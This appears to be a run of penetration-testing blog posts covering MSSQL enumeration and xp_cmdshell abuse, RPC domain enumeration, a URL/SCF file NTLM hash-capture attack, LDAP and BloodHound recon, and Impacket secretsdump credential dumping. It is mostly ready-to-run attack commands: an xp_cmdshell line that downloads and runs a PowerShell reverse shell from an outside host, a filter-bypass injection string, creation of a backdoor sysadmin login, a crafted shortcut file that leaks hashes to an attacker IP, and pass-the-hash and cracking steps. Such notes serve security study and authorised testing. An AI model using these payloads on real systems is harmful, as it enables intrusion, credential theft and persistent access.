by Vry4n_ | Mar 9, 2024 | Active Gathering
Microsoft SQL Server (MSSQL) is a relational database management system (RDBMS) developed by Microsoft. It is a robust and scalable database platform used by organizations for storing, managing, and retrieving data. SQL Server supports a wide range of transaction processing, business intelligence, and analytics applications. It offers various features including support for SQL queries, stored procedures, triggers, views, indexing, and data replication.
By default, SQL Server listens on port 1433 for TCP/IP connections. However, this port can be changed during installation or configuration.
Named Pipes: Named Pipes is another network protocol supported by SQL Server. It provides communication between processes on the same computer or between processes on different computers within the same network domain.
Shared Memory: Shared Memory is a protocol that allows communication between SQL Server and client applications running on the same computer. It provides high-performance communication by utilizing shared memory segments.
Connection Strings: Client applications use connection strings to specify the server name, database name, authentication method, and other connection parameters. Connection strings are essential for establishing connections to SQL Server databases.
Authentication: SQL Server supports various authentication modes, including Windows Authentication and SQL Server Authentication. Windows Authentication relies on Windows user accounts, while SQL Server Authentication uses SQL Server-specific usernames and passwords.
Default MS-SQL System Tables
- master Database: This database is crucial as it captures all system-level details for a SQL Server instance.
- msdb Database: SQL Server Agent utilizes this database to manage scheduling for alerts and jobs.
- model Database: Acts as a blueprint for every new database on the SQL Server instance, where any alterations like size, collation, recovery model, and more are mirrored in newly created databases.
- Resource Database: A read-only database that houses system objects that come with SQL Server. These objects, while stored physically in the Resource database, are logically presented in the sys schema of every database.
- tempdb Database: Serves as a temporary storage area for transient objects or intermediate result sets.
Enumeration
Nmap
1. Scan the port 1433
nmap -sV -sC -A -p 1433 192.168.0.100
ms-sql-ntlm-info: information related to NTLM (Windows NT LAN Manager) authentication. It includes details such as the target name, NetBIOS domain name, NetBIOS computer name, DNS domain name, DNS computer name, and product version.
ms-sql-info: information about the SQL Server instance, including the version, product name, service pack level (RC0), and whether post-service pack patches have been applied.
ssl-date: information about the SSL certificate associated with the SQL Server instance. It shows the date and time when the certificate was issued and its validity period.
ssl-cert: details about the SSL certificate, including the subject (common name) and validity period (not valid before and not valid after dates).
2. Execute a vulnerability scan
- nmap –script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes –script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 192.168.0.100
Metasploit
scanner/mssql/mssql_ping)
1. You can try to enumerate hosts running MSSQL in the network
- use auxiliary/scanner/mssql/mssql_ping
- set RHOSTS [192.168.0.0/24]
- set THREADS [number of threads]
- run
admin/mssql/mssql_enum (Authenticated)
1. Enumerate database information, table names, storage paths, policies, login information
- use admin/mssql/mssql_enum
- set RHOSTS 192.168.0.100
- set RHOSTS 192.168.0.100
- set USERNAME vry4n
- (OPTIONAL) set USE_WINDOWS_AUTHENT true
- (OPTIONAL) set DOMAIN <lab>
2. Run the script
admin/mssql/mssql_enum (authenticated)
1. Enumerate domain users
- use admin/mssql/mssql_enum_domain_accounts
- set RHOSTS 192.168.0.100
- set RHOSTS 192.168.0.100
- Set USERNAME vry4n
- (OPTIONAL) set USE_WINDOWS_AUTHENT true
- (OPTIONAL) set DOMAIN <lab>
- run
admin/mssql/mssql_enum_sql_logins
1. Enumerate logins
- use admin/mssql/mssql_enum_sql_logins
- set RHOSTS 192.168.0.100
- set RHOSTS 192.168.0.100
- Set USERNAME vry4n
- (OPTIONAL) set USE_WINDOWS_AUTHENT true
- (OPTIONAL) set DOMAIN <lab>
- run
auxiliary/admin/mssql/mssql_findandsampledata
1. Get database sample data
- use auxiliary/admin/mssql/mssql_findandsampledata
auxiliary/scanner/mssql/mssql_hashdump
1. Attempt to extract hashdump
- use auxiliary/scanner/mssql/mssql_hashdump
auxiliary/scanner/mssql/mssql_schemadump
1. extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb.
- use auxiliary/scanner/mssql/mssql_schemadump
auxiliary/admin/mssql/mssql_idf
1. This module will search the specified MSSQL server for ‘interesting’ columns and data.
- use auxiliary/admin/mssql/mssql_idf
windows/mssql/mssql_linkcrawler
1. crawl MS SQL Server database links and deploy Metasploit payloads through links configured with sysadmin privileges using a valid SQL Server Login.
- use exploit/windows/mssql/mssql_linkcrawler
admin/mssql/mssql_escalate_execute_as
1. Escalate privileges if the IMPERSONATION privilege has been assigned to the user.
- use admin/mssql/mssql_escalate_execute_as
admin/mssql/mssql_escalate_dbowner
1. escalate privileges if the IMPERSONATION privilege has been assigned to the user.
- use admin/mssql/mssql_escalate_dbowner
admin/mssql/mssql_exec
1. Execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell (default) or the sp_oacreate procedure (more opsec safe, no output, no temporary data table). A valid username and password is required to use this module.
- use admin/mssql/mssql_exec
- set CMD <command>
windows/manage/mssql_local_auth_bypass
1. executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure.
- use windows/manage/mssql_local_auth_bypass
Impacket-mssql
1. Login to the MSSQL instance
- impacket-mssqlclient -db Test_users lab/vry4n:IamAdmin123@192.168.0.100
- impacket-mssqlclient -db Test_users lab/vry4n:IamAdmin123@192.168.0.100 -windows-auth
- impacket-mssqlclient lab/vry4n:IamAdmin123@192.168.0.100 -windows-auth
Sqsh
1. Login to the MSSQL instance
- sqsh -S <IP> -U <Username> -P <Password> -D <Database>
- sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
CrackMapExec
1. Execute commands
- crackmapexec mssql -d lab -u vry4n -p IamAdmin123 -x “<command>” 192.168.0.100
- crackmapexec mssql -d lab -u vry4n -p IamAdmin123 -x “whoami” 192.168.0.100
2. Pass the hash
- crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X ‘$PSVersionTable’
MSSQL commands to enumerate the database
# Get version
# Get user
# Get databases
- SELECT name FROM master.dbo.sysdatabases;
# Use database
#Get table names
- SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
- EXEC sp_linkedservers
- SELECT * FROM sys.servers;
#List users
- select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then ‘Disabled’ else ‘Enabled’ end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in (‘G’, ‘R’) order by sp.name;
#Create user with sysadmin privs
- CREATE LOGIN hacker WITH PASSWORD = ‘P@ssword123!’
- EXEC sp_addsrvrolemember ‘hacker’, ‘sysadmin’
# Get all the users and roles
- select * from sys.database_principals;
## This query filters a bit the results
- SELECT name, create_date, modify_date, type_desc AS type, authentication_type_desc AS authentication_type, sid FROM sys.database_principals WHERE type NOT IN (‘A’, ‘R’) ORDER BY name;
## Both of these select all the users of the current database (not the server). Interesting when you cannot access the table sys.database_principals
- EXEC sp_helpuser
- SELECT * FROM sysusers
Permissions
1, Securable: Defined as the resources managed by SQL Server for access control. These are categorized into:
- Server – Examples include databases, logins, endpoints, availability groups, and server roles.
- Database – Examples cover database role, application roles, schema, certificates, full text catalogs, and users.
- Schema – Includes tables, views, procedures, functions, synonyms, etc.
2. Permission: Associated with SQL Server securables, permissions such as ALTER, CONTROL, and CREATE can be granted to a principal. Management of permissions occurs at two levels:
- Server Level using logins
- Database Level using users
3. Principal: This term refers to the entity that is granted permission to a securable. Principals mainly include logins and database users. The control over access to securables is exercised through the granting or denying of permissions or by including logins and users in roles equipped with access rights.
# Show all different securables names
- SELECT distinct class_desc FROM sys.fn_builtin_permissions(DEFAULT);
# Show all possible permissions in MSSQL
- SELECT * FROM sys.fn_builtin_permissions(DEFAULT);
# Get all my permissions over securable type SERVER
- SELECT * FROM fn_my_permissions(NULL, ‘SERVER’);
# Get all my permissions over a database
- USE <database>
- SELECT * FROM fn_my_permissions(NULL, ‘DATABASE’);
# Get members of the role “sysadmin”
- Use master
- EXEC sp_helpsrvrolemember ‘sysadmin’;
# Get if the current user is sysadmin
- SELECT IS_SRVROLEMEMBER(‘sysadmin’);
# Get users that can run xp_cmdshell
- Use master
- EXEC sp_helprotect ‘xp_cmdshell’
# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = ‘xp_cmdshell’;
Note that in order to be able to execute commands it’s not only necessary to have xp_cmdshell enabled, but also have the EXECUTE permission on the xp_cmdshell stored procedure. You can get who (except sysadmins) can use xp_cmdshell with:
- Use master
- EXEC sp_helprotect ‘xp_cmdshell’
# This turns on advanced options and is needed to configure xp_cmdshell
- sp_configure ‘show advanced options’, ‘1’
- RECONFIGURE
#This enables xp_cmdshell
- sp_configure ‘xp_cmdshell’, ‘1’
- RECONFIGURE
#One liner
- sp_configure ‘Show Advanced Options’, 1; RECONFIGURE; sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;
# Quickly check what the service account is via xp_cmdshell
- EXEC master..xp_cmdshell ‘whoami’
# Get Rev shell
- EXEC xp_cmdshell ‘echo IEX(New-Object Net.WebClient).DownloadString(“http://10.10.14.13:8000/rev.ps1”) | powershell -noprofile’
# Bypass blackisted “EXEC xp_cmdshell”
- ‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping 192.168.0.11’ —
# You can check if who (apart sysadmins) has permissions to run those MSSQL functions with:
Use master;
- EXEC sp_helprotect ‘xp_dirtree’;
- EXEC sp_helprotect ‘xp_subdirs’;
- EXEC sp_helprotect ‘xp_fileexist’;
by Vry4n_ | Feb 17, 2024 | Uncategorised
Remote Procedure Call (RPC) is a protocol that allows programs to execute procedures on a remote server as if they were local. In the context of domain enumeration, RPC can be leveraged to extract information from Windows-based systems within a network. The enumeration process involves gathering details about users, groups, shares, and other resources within a Windows domain.
NetSession Enumeration:
- By using RPC, attackers can enumerate active sessions on a target machine. This provides information about users who are currently connected to the system.
NetShare Enumeration:
- RPC can be utilized to enumerate shared resources on a system, revealing information about accessible network shares and permissions.
NetLocalGroup Enumeration:
- RPC can be employed to enumerate local groups on a remote machine. This provides insights into the users and groups present on the system.
NetUser Enumeration:
- RPC can be used to enumerate user accounts on a target machine, helping attackers identify potential targets or gain insights into the user landscape.
NetGroup Enumeration:
- RPC allows enumeration of domain groups, providing information about group memberships and relationships within the domain.
How to
1. Having a valid AD username and password, in our case (User: active.htb\SVC_TGS, Password: GPPstillStandingStrong2k18). We will authenticate using rpcclient
- rpcclient -U “SVC_TGS” 10.10.10.100
- GPPstillStandingStrong2k18
2. Enumerate the domain users
Note: Focus on the administrator users
3. You can also enumerate the groups, there we may find “admin” group
4. Show the users that belong to a group, we will use the group RID
Note: This will display the RID of the users members of this group, in our case rid:[0x1f4]
5. We can now query for this user (0x1f4)
Note: We can see we got the administrator user as a result
Recommendations:
Authorization and Legitimate Use:
- Ensure that any RPC enumeration activities are authorized and conducted in a legitimate testing or administrative context.
Logging and Monitoring:
- Monitor network logs for unusual RPC-related activities, which could indicate potential enumeration attempts.
Minimize Attack Surface:
- Minimize the attack surface by restricting unnecessary RPC services and securing network configurations.
Regular Audits:
- Conduct regular security audits to identify and remediate vulnerabilities that could be exploited through RPC enumeration.
Keep Systems Updated:
- Regularly update and patch systems to address any vulnerabilities that could be targeted during RPC domain enumeration.
by Vry4n_ | Feb 17, 2024 | Active Directory
A URL file attack captures account hashes via a user accessing a folder that contains a specially crafted file that forces the user to request an icon off the attackers machine. The resource does not exist though. The act of initiating a connection to the attackers machine is how the hash is captured. Also note that the user does not need to open the file, nor is their any indication that anything has happened behind the scenes. They just need to open the folder that the file is located in which makes this a perfect for shared folders.
This attack is only applicable to intranet communication and does not work with outside network.
This is a post compromise attack and following are the conditions
- There is a file share accessible across the network
- Attacker has compromised at least one machine which has access to the file share with write permissions
1. Create The File
The file name must begin with either a “@” symbol or a “~” symbol and the filetype must be “url”. Example: “@readme.url”
2. Contents of the file
[InternetShortcut]
URL=http://google.com
WorkingDirectory=%username%
IconFile=\\<attacker IP>\%USERNAME%.icon
IconIndex=1
Extra
The same can be done with an scf file. Example: @readme.scf
[Shell]
Command=2
IconFile=\\<attacker IP>\Share\test.ico
[Taskbar]
Command=ToggleDesktop
Explanation
- [InternetShortcut] is a header line that specifies the file type and indicates that the following lines are instructions for an internet shortcut
- URL=anyurl specifies the URL of the website or web page that the shortcut should launch. The actual URL should be provided in place of the “anyurl” placeholder
- WorkingDirectory=anydir specifies the default working directory for the shortcut. In most cases, this will be the directory in which the shortcut file is located. You can replace the “anydir” placeholder with the full path of the directory, if necessary
- IconFile=\\x.x.x.x\%USERNAME%.icon specifies the location of the icon file to use for the shortcut. The icon file can be stored on a remote computer, which is specified by the IP address “x.x.x.x”. The “%USERNAME%” placeholder is replaced with the current user’s username. The “.icon” extension specifies the type of file that contains the icon data
- IconIndex=1 specifies which icon in the specified icon file should be used for the shortcut. In this case, the number “1” references to the first icon in the file for use. If the icon file contains multiple icons, choose the number accordingly to select a different icon
Exploitation
1. Connect to a share and drop the file (.url or .scf) (@readme.url or @readme.scf) @ in the name sets the file at the top, make sure the file has the proper file type
2. Start responder with HTTP and SMB is turned ON
- sudo responder -I eth0 -w -b -v -F
3. Wait for someone to connect to the share, and, you’ll get data back
Cracking with hashcat
1. Identify the hash type number using (https://hashcat.net/wiki/doku.php?id=example_hashes)
2. Knowing the hash ID from https://hashcat.net/ we can proceed to use the hash file, and a wordlist
- hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Note: as you can see Status: Cracked, and the password is displayed next to the hash, Password: Kyuubi123
Cracking using John
1. Identify the hash type using –list=format
- john –list=formats | awk -F”, ” ‘{for (i=1; i<=NF; i++) print $i}’ | grep -i ntlm
2. Run john against our hash file, set the hash type and the wordlist
- john –wordlist=/usr/share/wordlists/rockyou.txt –format=netntlmv2 hash.txt
Source
https://swepstopia.com/url-file-attack/
https://www.hackingloops.com/url-file-attack-and-printnightmare/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#scf-and-url-file-attack-against-writeable-share
https://zsecurity.org/url-file-attacks-active-directory-pentesting/
https://www.sevenlayers.com/index.php/blog/494-url-file-attacks
by Vry4n_ | Feb 17, 2024 | Active Directory
In an Active Directory domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for gathering information in the recon phase of a pentest of an internal network. A problem is that data from LDAP often is not available in an easy to read format.
Generally, you’ll need at least the following permissions:
Read Access to Active Directory:
- The account should have read access to the Active Directory structure to retrieve information about users, groups, and other directory objects.
Replicating Directory Changes:
- For more detailed information, such as the last logon time of users, the account may need the “Replicating Directory Changes” permission. This permission is required for attributes that are not included in the default read access.
Administrative Privileges (Optional):
- In some cases, ladpdumpdomain may require administrative privileges to retrieve certain information. If you’re looking to gather data on administrative groups or accounts, the account running the tool may need to be a member of a group with sufficient privileges.
Network Access:
- Ensure that the account has the necessary network access to connect to the domain controller and query Active Directory.
Ldapdomain enum
ldapdomaindump is a tool used for dumping information from Active Directory, including user accounts, group memberships, and other relevant details, by collecting and parsing information available via LDAP and outputting it in a human readable HTML format, as well as machine readable json and csv/tsv/greppable files.
You can find the tool on GitHub or other reliable sources. (https://github.com/dirkjanm/ldapdomaindump)
The tool was designed with the following goals in mind:
- Easy overview of all users/groups/computers/policies in the domain
- Authentication both via username and password, as with NTLM hashes (requires ldap3 >=1.3.1)
- Possibility to run the tool with an existing authenticated connection to an LDAP service, allowing for integration with relaying tools such as impackets ntlmrelayx
The tool outputs several files containing an overview of objects in the domain:
- domain_groups: List of groups in the domain
- domain_users: List of users in the domain
- domain_computers: List of computer accounts in the domain
- domain_policy: Domain policy such as password requirements and lockout policy
- domain_trusts: Incoming and outgoing domain trusts, and their properties
As well as two grouped files:
- domain_users_by_group: Domain users per group they are member of
- domain_computers_by_os: Domain computers sorted by Operating System
How to use ldapdomaindum
1. Execute the script (it is pre-installed in newer Kali Linux) against the Domain Controller server
- sudo ldapdomaindump ldaps://192.168.0.100 -u ‘lab.local\vry4n’ -p IamAdmin123 -o data
ldapdomaindump: This is likely the name of a tool or script designed for extracting information from an LDAP (Lightweight Directory Access Protocol) server. It’s used to query and retrieve data from an LDAP directory.
ldaps://192.168.0.100: This specifies the LDAP server’s address and protocol. In this case, it’s using LDAPS, which is the secure version of LDAP over TLS/SSL. The server is located at the IP address 192.168.0.100.
-u ‘lab.local\vry4n’: This option specifies the username to be used for authentication. The provided username is in the format domain\username, where lab.local is the domain and vry4n is the username.
-p IamAdmin123: This option specifies the password associated with the provided username. In this case, the password is set to ‘IamAdmin123’.
-o data: creates a new folder and saves the files there
2. Inspect all the files looking for users, computers, trusts, groups, policies
Post enumeration using Bloodhound
1. Set up the tool
- sudo pip install bloodhound
2. Run neo4j
3. Navigate to the address provided by neo4j,in this case http://localhost:7474/
- username: neo4j
- password: neo4j
Note: After logging in you might be asked to change the password
4. Download and run bloodhound
- wget https://github.com/BloodHoundAD/BloodHound/releases/download/4.0.2/BloodHound-linux-x64.zip
- unzip BloodHound-linux-x64.zip
- cd BloodHound-linux-x64
- sudo ./BloodHound –no-sandbox
4. Use your neo4j credentials
- username: neo4j
- password: newneo4j
5. Inject data into Bloodhound, you can use bloodhound tool for this
- mkdir bloodhound-results
- cd bloodhound-results
- sudo bloodhound-python -d lab.local -u vry4n -p IamAdmin123 -ns 192.168.0.100 -c all
bloodhound-python: This is a tool used for Active Directory (AD) enumeration and analysis. It helps identify attack paths, permissions, and potential security risks within an AD environment.
-d lab.local: Specifies the Active Directory domain to target, in this case, it’s set to ‘lab.local’.
-u vry4n: Specifies the username to be used for authentication. In this case, the username is ‘vry4n’.
-p IamAdmin123: Specifies the password associated with the provided username. Here, the password is set to ‘IamAdmin123’.
-ns 192.168.0.100: Specifies the target Active Directory server’s IP address. It’s set to ‘192.168.0.100’.
-c all: Specifies the collection method. In this case, ‘all’ indicates that all available data should be collected. This includes information about domains, users, groups, computers, group memberships, permissions, etc.
6. In Bloodhound click on “upload data”, selectthe .json files, click open
7. Once data is loaded it is displayed in Bloodhound, you can start your searches and mapping relationships
Post enumeration using Plumhound
1. We need to run this tool on top of Bloodhound & Neo4j which should be running (https://github.com/PlumHound/PlumHound) , to set up this tool
- git clone https://github.com/PlumHound/PlumHound.git
- cd PlumHound
- sudo pip3 install -r requirements.txt
2. Run the tool to do a test, using neo4j password
- sudo python3 PumHound.py –easy -p newneo4j
3. Make sure all the tasks completed
4. Knowing that the test completed, now you can run a task, read PlumHound documentation to know about tasks, this will create a new folder with a Report.zip file
- sudo python3 PumHound.py -x tasks/default.tasks -p <neo4j password>
5. Unzip and start looking at the data
- cd reports
- unzip Reports.zip
Health check with PingCastle
1. Having remote access to the computer we can run PingCastle executable, Download the tool from (https://www.pingcastle.com/download/)
2. Using cmd or powershell run the executable
3. Select the type of check, in this case I’ll select 1. HealthCheck, then enter the domain
4. It may take some minutes until it completes, it creates 2 files with data .html & .xml
5. opening this file we get a lot of information about the domain, and possible misconfigurations. 
by Vry4n_ | Feb 17, 2024 | Active Directory, Credential Dumping
Impacket SecretsDump is a powerful tool used in penetration testing and ethical hacking for extracting plaintext credentials and other sensitive information from Windows systems. Developed in Python, Impacket is an open-source collection of Python classes for working with network protocols. SecretsDump, a part of the Impacket suite, focuses specifically on extracting credentials and secrets from Windows machines.
| Hive |
Details |
Format or credential material |
| SAM |
stores locally cached credentials (referred to as SAM secrets) |
LM or NT hashes |
| SECURITY |
stores domain cached credentials (referred to as LSA secrets) |
Plaintext passwords
LM or NT hashes
Kerberos keys (DES, AES)
Domain Cached Credentials (DCC1 and DCC2)
Security Questions (L$SQSA<SID>) |
| SYSTEM |
contains enough info to decrypt SAM secrets and LSA secrets |
N/A |
Capabilities:
- Credential Extraction
- Kerberos Ticket Extraction
- NTLM Hash Dumping
- Local and Remote Operations
- Pass-the-Ticket (PTT) Attack
How to use
1. Display the tool help
2. Remote dumping of SAM & LSA secrets
- impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.101
3. dump the NTLM from DC, Active directory users
- impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.100 -just-dc-ntlm
4. Remote dumping of SAM & LSA secrets (pass-the-hash)
- secretsdump.py -hashes ‘LMhash:NThash’ ‘DOMAIN/USER@TARGET’
- impacket-secretsdump lab.local/administrator@192.168.0.100 -hashes aad3b435b51404eeaad3b435b51404ee:702262e2d64f9c0df2bec8ca45ff2985
5. Remote dumping of SAM & LSA secrets (pass-the-ticket)
- secretsdump.py -k ‘DOMAIN/USER@TARGET’
6. Offline dumping of LSA secrets from exported hives
- secretsdump.py -security ‘/path/to/security.save’ -system ‘/path/to/system.save’ LOCAL
7. Offline dumping of SAM secrets from exported hives
- secretsdump.py -sam ‘/path/to/sam.save’ -system ‘/path/to/system.save’ LOCAL
8. Offline dumping of SAM & LSA secrets from exported hives
- secretsdump.py -sam ‘/path/to/sam.save’ -security ‘/path/to/security.save’ -system ‘/path/to/system.save’ LOCAL